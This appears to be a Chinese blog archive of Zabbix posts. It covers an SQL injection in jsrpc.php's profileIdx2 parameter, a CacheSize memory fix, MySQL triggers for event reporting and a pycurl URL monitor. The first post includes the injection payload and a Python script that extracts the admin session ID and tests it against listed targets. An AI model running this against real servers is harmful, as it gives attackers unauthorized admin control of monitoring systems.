月份：2017年8月

• zabbix是一个开源的企业级性能监控解决方案。

• 官方网站：http://www.zabbix.com

• zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞，攻击者无需授权登陆即可登陆zabbix管理系统，也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。

• 影响范围：2.2.x, 3.0.0-3.0.3。（其他版本未经测试）

漏洞测试

在您的zabbix的地址后面加上如下url：

/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim
estamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi
story.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfil
e=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=
17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&
mark_color=1

输出结果，出现如下内容（包含：You have an error in your SQL syntax;）表示漏洞存在：

<div class="flickerfreescreen" data-timestamp="1471054088083" id="flickerfreescreen_1"><table class="list-table" 
id="t57ae81946b8cb"><thead><tr><th class="cell-width">Timestamp</th><th>Value</th></tr></thead><tbody><tr 
class="nothing-to-show"><td colspan="2">No data found.</td></tr></tbody></table></div><div class="msg-bad"><div 
class="msg-details"><ul><li>Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES 
(39, 1, 'web.item.graph.period', '3600', 2, 2'3297)] [You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]</li><li>Error in query 
[INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (40, 1, 'web.item.graph.stime', 
'20160813041028', 3, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near ''3297)' at line 1]</li><li>Error in query [INSERT INTO profiles 
(profileid, userid, idx, value_int, type, idx2) VALUES (41, 1, 'web.item.graph.isnow', '1', 2, 2'3297)] [You have an 
error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use 
near ''3297)' at line 1]</li></ul></div><span class="overlay-close-btn" onclick="javascript: 
$(this).closest('.msg-bad').remove();" title="Close"></span></div>

以上为仅为漏洞验证测试方式。

攻击者可以通过进一步构造语句进行错误型sql注射，无需获取和破解加密的管理员密码。

有经验的攻击者可以直接通过获取admin的sessionid来根据结构算法构造sid，替换cookie直接以管理员身份登陆。

利用工具，可自动判断Session是否可用

import urllib,sys,urllib2,urllib
def cookie(url):
    poc='/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from (select count(*),concat(floor(rand(0)*2), (select sessionid from sessions where userid=1 and status=0 limit 1))x from information_schema.character_sets group by x)y)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color='
    body= urllib.urlopen(url+poc).read()
    cookie=body.split('Duplicate entry')[1].split('for key')[0][3:-2]
    return cookie
def test(cookie,url):
    url=url+'proxies.php'
    req=urllib2.Request(url)
    cook="zbx_sessionid=%s" % cookie
    req.add_header('Cookie', cook)
    response=urllib2.urlopen(req)
    data=response.read()
    if data.find('Access denied.') < 0:
        print "OK-->",cookie
    else:
        print 'ERROR'
if len(sys.argv)==4:
    for i in open(sys.argv[3]).readlines():
        print i
        test(cookie(i),i)
else:
    print sys.argv[1]
    test(cookie(sys.argv[1]),sys.argv[1])

Zabbix Server突然挂了，查看log报错如下：

using configuration file: /etc/zabbix/zabbix_server.conf
...
[file:dbconfig.c,line:545] zbx_mem_malloc(): out of memory (requested 16 bytes)
[file:dbconfig.c,line:545] zbx_mem_malloc(): please increase CacheSize configuration parameter

报错里已经很明确的提示了修复办法：please increase CacheSize configuration parameter

所以，我们就去zabbix_server.conf中找到CacheSize字段

### Option: CacheSize
#   Size of configuration cache, in bytes.
#   Shared memory size for storing host, item and trigger data.
#
# Mandatory: no
# Range: 128K-8G
# Default:
# CacheSize=8M

根据服务器配置情况，修改CacheSize

### Option: CacheSize
#   Size of configuration cache, in bytes.
#   Shared memory size for storing host, item and trigger data.
#
# Mandatory: no
# Range: 128K-8G
# Default:
CacheSize=2048M

重启Zabbix Server即可

systemctl start zabbix-server

由于现网设备量比较大，根据业务类型又分了上百个左右的业务模块。而基于zabbix搭建的基础告警每天吐出的告警信息特别多。为了提高告警的准确性和及时率，同时也便于后期查询和报表统计。考虑将zabbix的部分进行下修改。

一、alerts表信息提取

alerts 中存放的是通过短信、邮件或其他媒介发出的告警数据 。比如要提取当天的所有磁盘相应的已发出的所有告警，可以通过如下sql 语句实现：

select FROM_UNIXTIME(clock),sendto,`subject` from alerts
where `subject` like '%磁盘%'
and DATE_FORMAT(FROM_UNIXTIME(clock),'%Y-%m-%d') = DATE_FORMAT(NOW(),'%Y-%m-%d');

由于其中的clock时间使用的是unixtime，所以这里需要查询的时候通过转化，就成datetime时间 。查询结果如下：

不过通过alter表获取的数据有以下缺点：

• 不好明确区分告警问题是否已恢复（通过告警恢复正常触发器可以判读，但 alerts 数据量比较大时，就不好处理了）；

• 并未配置媒介告警的事件类无法在该表体现；

• 不便区分告警问题的级别；

二、event事件表关联

通过event表，关联基他几个表的数据，可以将查询的结果生成一个临时表 。通过查询该临时表，可以得到我们关心的几个数据：

#创建临时表
DROP TABLE IF EXISTS `tmp1`;
create table tmp1 as
     (SELECT
            `hosts`.`host`,
            `triggers`.triggerid,
            `triggers`.description,
            `triggers`.priority,
            `events`.`value`,
            FROM_UNIXTIME(`events`.clock) time
    FROM
            `hosts`,
            `triggers`,
            `events`,
            `items`,
            `functions`,
            `groups`,
            `hosts_groups`
    WHERE
            `hosts`.hostid = `hosts_groups`.hostid
            AND `hosts_groups`.groupid = `groups`.groupid
            AND `triggers`.triggerid = `events`.objectid
            AND `hosts`.hostid = `items`.hostid
            AND `items`.itemid = `functions`.itemid
            AND `functions`.triggerid = `triggers`.triggerid);
#查询磁盘告警，且未恢复的
select * from tmp1 where value=1
and  triggerid not in (select triggerid from tmp1 where value=0)
and  description like '%磁盘%';

其中triggers.priority字段表示的是事件的告警级别（如普通、严重），events.value代表的是告警事件是否恢复（1代表存在问题，0代表正常），triggers.description 为告警描述信息 。

event事件关联临时表虽然解决了我们的需求，不过也存在一些小瑕疵：由于设备量比较多，仅仅几个月的基础事件就有几百万条，每次查询为了保证事件的完整性，都需要执行删除临时表，再重新将查询结果生成到临时表的方法相对较慢 ，而且当这个查询执行的时候会对mysql 造成一点性能伤害 －－－尽管可以在zabbix 的mysql 备库上执行 。

三、mysql 触发器

为了满足后期一些报表定制查询的需要，决定使用触发器，对event事件表发生insert操作时，自动将查行一个select关联查询，并将关联查询的结果

这里只使用newevent事件表，其中devtype、cause、sendstatus字段也暂时不用，后期需要分表设计时，可以考虑使用。如果启用dict表，还有一个可优化的项，因为description类型只有几千个，而newevent事件有几百万条，可以去掉description字段，将该字段放到dict表里，通过descid 字段去关联。

这里先以最简单的方式进行实现，先建库建表，如下：

DROP DATABASE IF EXISTS `report`;
CREATE DATABASE report character set utf8;
USE report;
DROP TABLE IF EXISTS `newevent`;
CREATE TABLE `newevent` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `host` varchar(128) CHARACTER SET utf8 NOT NULL DEFAULT '',
  `triggerid` bigint(20) unsigned NOT NULL,
  `description` varchar(255) CHARACTER SET utf8 NOT NULL DEFAULT '',
  `priority` int(11) NOT NULL DEFAULT '0',
  `value` int(11) NOT NULL DEFAULT '0',
  `time` datetime DEFAULT NULL,
   primary key (id)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

触发器创建如下：

DELIMITER $$
DROP TRIGGER IF EXISTS after_insert_on_event;
CREATE TRIGGER after_insert_on_event
AFTER INSERT ON zabbix.`events`
FOR EACH ROW
BEGIN
    INSERT INTO report.newevent (
        report.newevent.host,
        report.newevent.triggerid,
        report.newevent.description,
        report.newevent.priority,
        report.newevent.value,
        report.newevent.time
    )
    SELECT
        zabbix.`hosts`.`host`,
        zabbix.`triggers`.triggerid,
        zabbix.`triggers`.description,
        zabbix.`triggers`.priority,
        zabbix.`events`.`value`,
        FROM_UNIXTIME(zabbix.`events`.clock)
    FROM
        zabbix.`hosts`,
        zabbix.`triggers`,
        zabbix.`events`,
        zabbix.items,
        zabbix.functions,
        zabbix.groups,
        zabbix.hosts_groups
    WHERE
        zabbix.`hosts`.hostid = zabbix.hosts_groups.hostid
        AND zabbix.hosts_groups.groupid = zabbix.groups.groupid
        AND zabbix.`triggers`.triggerid = zabbix.`events`.objectid
        AND zabbix.`hosts`.hostid = zabbix.items.hostid
        AND zabbix.items.itemid = zabbix.functions.itemid
        AND zabbix.functions.triggerid = zabbix.`triggers`.triggerid
        AND zabbix.`events`.eventid=new.eventid;
END;
$$
DELIMITER ;

注，这个新的事件表同样也可以创建在zabbix库内，这里单独又建一个库的目的主要是为了后期定制开发及和其他平台对接的需要。后续只要event表中每新增一条数据，对应的数据就会在新的表中增加。

四、待解决问题及其他

1、备库触发器问题

最早的设计是将mysql 的这个触发器和新库建在备库上，不过发现在备库上创建完成后，newevent表中并没有数据，在网上也查到过主备库同步，备库触发器不生效的问题。网上给的解释是由于主备库之间的同步模式为mixed或row级时，就会出现备库上不捕获inster这种操作的情况。改成基于sql 语句同步的方式会解决，不过发现更改为基于sql 语句后，也不生效。

不重启数据库，通过修改变量修改sql 模式的语名如下：

SET GLOBAL binlog_format = 'STATEMENT';

mysql同步复制的三种模式如下：

-- 基于SQL语句的复制(statement-based replication, SBR)，
-- 基于行的复制(row-based replication, RBR)，
-- 混合模式复制(mixed-based replication, MBR)。

具体三者之间的优缺点比对可以参看csdn上的一篇博文 －－－ MYSQL复制的几种模式(http://blog.csdn.net/adparking/article/details/7586054) 。

还有提到和mysql 事务隔离级别相关的，关于事务隔离级别部分的知识可以参看这篇博文 －－－ MySQL数据库事务隔离级别(http://blog.csdn.net/jiangwei0910410003/article/details/24960785) 。

2、其他

如果想基于老的想要后期查询或改档用，并且同时又想保证查询的速度，可以对历史的newevent做一个归档，比如，select每三个月的数据将其保存另一个带日志的表中。再清空该表的数据，重新接受触发数据库写入。

由于网络的问题，zabbix自带web模块用不了，后台研发2b，老是更新正式环境安装包，导致一直出问题，老是给他们擦屁股，早说过这事，他们不配合，现在出问题了，挺爽，这锅我表示不背，就找了pycurl这个模块写个监控。

pycurl模块用法：

（这块是抄的，引用地址：http://blog.csdn.net/xsj_blog/article/details/52102652）

c = pycurl.Curl()    #创建一个curl对象 
c.setopt(pycurl.CONNECTTIMEOUT, 5)    #连接的等待时间，设置为0则不等待  
c.setopt(pycurl.TIMEOUT, 5)           #请求超时时间  
c.setopt(pycurl.NOPROGRESS, 0)        #是否屏蔽下载进度条，非0则屏蔽  
c.setopt(pycurl.MAXREDIRS, 5)         #指定HTTP重定向的最大数  
c.setopt(pycurl.FORBID_REUSE, 1)      #完成交互后强制断开连接，不重用  
c.setopt(pycurl.FRESH_CONNECT,1)      #强制获取新的连接，即替代缓存中的连接  
c.setopt(pycurl.DNS_CACHE_TIMEOUT,60) #设置保存DNS信息的时间，默认为120秒  
c.setopt(pycurl.URL,"http://www.baidu.com")      #指定请求的URL  
c.setopt(pycurl.USERAGENT,"Mozilla/5.2 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50324)")    #配置请求HTTP头的User-Agent
c.setopt(pycurl.HEADERFUNCTION, getheader)   #将返回的HTTP HEADER定向到回调函数getheader
c.setopt(pycurl.WRITEFUNCTION, getbody)      #将返回的内容定向到回调函数getbody
c.setopt(pycurl.WRITEHEADER, fileobj)        #将返回的HTTP HEADER定向到fileobj文件对象
c.setopt(pycurl.WRITEDATA, fileobj)          #将返回的HTML内容定向到fileobj文件对象
c.getinfo(pycurl.HTTP_CODE)         #返回的HTTP状态码
c.getinfo(pycurl.TOTAL_TIME)        #传输结束所消耗的总时间
c.getinfo(pycurl.NAMELOOKUP_TIME)   #DNS解析所消耗的时间
c.getinfo(pycurl.CONNECT_TIME)      #建立连接所消耗的时间
c.getinfo(pycurl.PRETRANSFER_TIME)  #从建立连接到准备传输所消耗的时间
c.getinfo(pycurl.STARTTRANSFER_TIME)    #从建立连接到传输开始消耗的时间
c.getinfo(pycurl.REDIRECT_TIME)     #重定向所消耗的时间
c.getinfo(pycurl.SIZE_UPLOAD)       #上传数据包大小
c.getinfo(pycurl.SIZE_DOWNLOAD)     #下载数据包大小 
c.getinfo(pycurl.SPEED_DOWNLOAD)    #平均下载速度
c.getinfo(pycurl.SPEED_UPLOAD)      #平均上传速度
c.getinfo(pycurl.HEADER_SIZE)       #HTTP头部大小

代码如下：

#!/usr/bin/env python
# __*__coding:utf8__*__
#Author:wangpengtai
#Blog:http://wangpengtai.blog.51cto.com/
import pycurl
import sys
import StringIO #引用该模块的原因是：使用pycurl后会打印出页面内容，我们不需要看到这个内容，只需要获取页面反馈信息就行了，只能将其写入缓存中，目前没找到好办法，学艺不精，不会使用重定向写到os.devnull中，无奈初次下策。。。
#开始使用的是写入临时文件，但是会有权限问题，导致zabbix无法获取到数据。
class WebStatus(object):
    def __init__(self, url):
        self.url = url
        self.curl = pycurl.Curl()
        self.string = StringIO.StringIO()
        # 连接等待时间，0则不等待
        self.curl.setopt(pycurl.CONNECTTIMEOUT, 5)
        # 超时时间
        self.curl.setopt(pycurl.TIMEOUT, 5)
        # 下载进度条，非0则屏蔽
        self.curl.setopt(pycurl.NOPROGRESS, 1)
        # 指定HTTP重定向最大次数
        self.curl.setopt(pycurl.MAXREDIRS, 5)
        # 完成交互后强制断开连接，不重用
        self.curl.setopt(pycurl.FORBID_REUSE, 1)
        # 设置DNS信息保存时间，默认为120秒
        self.curl.setopt(pycurl.DNS_CACHE_TIMEOUT, 60)
        # 设置请求的Url
        self.curl.setopt(pycurl.URL, self.url)
        self.curl.setopt(pycurl.WRITEFUNCTION, self.string.write)#将页面内容写入缓存
        self.curl.perform()
    def request_value(self):
        data = {
            "Http_code": self.curl.getinfo(pycurl.HTTP_CODE),
            "Speed_download": self.curl.getinfo(pycurl.SPEED_DOWNLOAD),
            "Connect_time": self.curl.getinfo(pycurl.CONNECT_TIME),
            "Total_time": self.curl.getinfo(pycurl.TOTAL_TIME),
            "Dnslookup_time": self.curl.getinfo(pycurl.NAMELOOKUP_TIME),
            "Redirect_time": self.curl.getinfo(pycurl.REDIRECT_TIME),
            "Redirect_count": self.curl.getinfo(pycurl.REDIRECT_COUNT)
        }
        return data
    def __end__(self):  #释放内存和连接，做一个有始有终，有责任心的运维狗
        self.string.close()
        self.curl.close()
if __name__ == "__main__":
    Usage = """
Usage: python web_monitor.py url [Http_code|Speed_download|Connect_time|Total_time|Dnslookup_time|Redirect_time|Redirect_count]
    """
    try:
        url = sys.argv[1]
        request = sys.argv[2]
        try:
            s = WebStatus(url)
            try:
                print s.request_value()[request]
            except KeyError:
                print "Make sure 2nd argument is right!"
        except pycurl.error:
            print "Make sure the url is right or reachable!"
    except IndexError:
        print "Must be 2 arguments given!%s" % Usage

验证：www.baidu.com一直是我测（攻）试（击）的对象

一、配置zabbix自定义监控

这个相对来说比较灵活，可以找一台机器专门用来做监控，只需要在这台机器上配置以下内容就可以监控多个URL了。

zabbix界面中可以配置一个模版，将其挂在该机器上就行了。

1、将代码写到下面目录下并加上可执行权限

[root@zabbix-12-195 scripts]# pwd
/etc/zabbix/scripts
[root@zabbix-12-195 scripts]# vim web_monitor.py 
[root@zabbix-12-195 scripts]# chmod +x web_monitor.py

2、配置zabbix_agentd.conf

[root@zabbix-12-195 scripts]# cat /etc/zabbix_agentd.conf
UserParameter=web[*],/etc/zabbix/scripts/web_monitor.py $1 $2

3、重启zabbix-agentd

[root@zabbix-12-195 scripts]# service zabbix-agentd restart

二、配置zabbix监控

直接上图了,后续的添加就自由发挥了，好多返回值可以出图，可以做触发器告警等。不多叙述了。